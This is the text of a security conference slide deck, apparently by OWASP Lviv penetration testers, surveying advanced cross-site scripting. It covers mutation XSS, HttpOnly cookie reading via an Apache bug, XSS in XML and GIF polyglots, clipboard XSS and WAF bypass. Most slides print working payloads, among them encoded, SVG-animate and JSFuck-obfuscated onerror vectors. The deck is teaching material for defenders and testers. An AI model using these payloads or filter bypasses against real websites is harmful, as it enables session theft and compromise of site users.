XSS - Do you know EVERYTHING?
- 3. • WE are Penetration Testing
• WE are Security Professionals
• WE are OWASP Lviv Chapter
• WE are Legio… oops
blog: http://owasp-lviv.blogspot.com
skype: y.bilyk
TEAM
- 4. AGENDA
- Power of XSS
- Read HttpOnly Cookies
- XSS via XML and GIF
- Clipboard XSS
- WAF XSS Bypass
- 7. What XSS can do?
CSRF and ClickJacking
XSS Tunnel & Port Scanning
Exploit machines & Botnets
And other BAD things (BeeF)
- 8. • Real payloads:
– http://www.xss-payloads.com
• BeeF Presentation:
– http://t.co/NLHtrxEuZ0
What XSS can do? (Links)
- 11. • Two ways to modify DOM:
–DOM Direct Manipulation
–Using innerHTML
innerHtml
- 12. <script type ="text / javascript">
var new = "New <b> second </b> text";
function Change () {
document.all.myPar.innerHTML = new ;
}
</script >
<p id ="myPar"> First text </p >
<a href ="javascript : Change ()">
Change text above !
</a >
Example of innerHTML
- 13. Mutation XSS (Basics)
Web Browsers tolerates
wrong HTML syntax
It could cause very
interesting behavior
In some cases “safe” payload
could be transformed into
XSS injection
- 14. Example of HTML mutation
<s class ="">hello <b>goodbye</b>
<S>hello <B>goodbye</B></S>
Original Data
Mutated data by browser
- 15. Example of HTML mutation (JS)
<img src ="test.jpg" alt ="``onload=xss()"/>
<IMG alt =``onload=xss() src ="test.jpg">
Original Data
Mutated data by browser
- 16. Mutation XSS (Some Examples)
<p style="font-family:'223bx:expression(alert(1))/*'">
<P style="FONT-FAMILY: ; x: expression(alert(1))"></P>
Original Data
Mutated data by browser
- 17. Mutation XSS (Some Examples)
<article xmlns="x:img src=x onerror=alert(1)">
<article xmlns="x:img src=x onerror=alert(1)">
<img src=x onerror=alert(1) :article
xmlns="x:img src=x onerror=alert(1)">
</img src=x onerror=alert(1) :article>
Original Data
Mutated data by browser
- 21. HttpOnly XSS
Apache before 2.2.22 incorrectly
processes long cookies
Generated error page contains
ALL cookies from the request
We can cause such error and
read response HTML via XSS
- 25. • JS can be run only from HTML?
–NO
• XML can contain valid JS?
–YES
So just run JS from XML
XSS in XML?
- 26. • We can insert HTML tags as CDATA
–But this is JUST text in browser view
• We can insert valid XML element and
declare (X)HTML namespace for data
inside this tag
(X)HTML in XML
- 27. XML Namespace (Basics)
• XML Namespaces provide a method to avoid element
name conflicts (for ex. during joining 2 xml documents)
<table>
<tr>
<td>Apples</td>
<td>Bananas</td>
</tr>
</table>
<table>
<name>Coffee</name>
<width>80</width>
<length>120</length>
</table>
- 28. XML Namespace (Conflicts)
• Name conflicts in XML can easily be avoided using a
name prefix (h: and f:)
<h:table>
<h:tr>
<h:td>Apples</h:td>
<h:td>Bananas</h:td>
</h:tr>
</h:table>
<f:table>
<f:name>Coffee</f:name>
<f:width>80</f:width>
<f:length>120</f:length>
</f:table>
- 29. XSS in XML (Payload)
<x:script
xmlns:x=
"http://www.w3.org/1999/xhtml">
alert(‘XSS');
</x:script>
- 31. How it Works?
Browser’s first decision based
on the content type of document
XML allows us to define
namespace (for. ex. (X)HTML)
BINGO! Browser executes part
of XML as (X)HTML (like SVG)
- 33. GIF File Format
GIF87a .. ). ......
47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff
ASCII
HEX
HEADER X Y SIZE IMG DATA
- 34. XSS GIF File Format
GIF87a /* ). ......
47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff
ASCII
HEX
HEADER X Y SIZE IMG DATA
- 35. XSS GIF File Format (Final)
GIF87a/*).......
GIF87a/*).......*/=0;
GIF87a/*).......*/=0;
alert(‘XSS’)
- 37. How it Works?
JavaScript Interpreter works only
with ASCII symbols
We need to modify some
non-printable symbols in the img.
header (to create valid JS syntax)
Inject JavaScript code into image
- 39. Clipboard (Basics)
Clipboard operations are not
simple memory copy operations
Data loaded from the clipboard
depends on destination (Notepad)
Data stored in the clipboard
depends on the source (MS Word)
- 40. Clipboard XSS (How?)
Edit font style in the document
(DOC, ODT, PDF, etc.)
Type/Create some text with new
font style in this document
Copy this text and paste into
text area on the victim site
- 41. </style><svg><style>svg {position:fixed}</style>
<style>svg {top:0}</style><style>svg {left:0}</style>
<style>svg {height:10000px}</style> <style>svg
{width:10000px}</style> <style>svg {opacity:0}</style>
<a xmlns:xlink="http://www.w3.org/1999/xlink"
xlink:href="?"><circle r="4000"></circle>
<animate attributeName="xlink:href" begin="0"
from="javascript:alert(document.domain)"
to="&" /> </a>
Clipboard XSS (Filter Bypass)
- 46. WAF XSS Bypass (Technics)
Mixed Encoding
(Double, HTML, URL encoding)
Rarely used events of the objects
and new HTML5 objects
JS-F**K Encoding
- 47. WAF XSS Bypass (Payloads)
URL Encoding + HTML Encoding + Unicode Encoding
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D
%22prom%5Cu0070t%2526%2523x28%3B%2526%25 23x27%3B
%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B
%2526%2523x27%3B%25 26%2523x29%3B%22%3E
<img/src="x"/onerror="promt(‘XSS’);">
- 48. WAF XSS Bypass (Payloads)
Rare objects events
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here
<menu id="xss" onshow="alert(1)">
- 49. WAF XSS Bypass (Payloads)
JS-F**K Encoding
<img/src="x"/onerror="[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!
![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+
(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]
+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]
+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![
]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[
])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+
[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[]
)[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]
]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]
])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[]
)[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()">
<img/src="x"/onerror=“alert(1)">
Editor's Notes
- An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
- An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
- An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
- An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
- An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
- An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other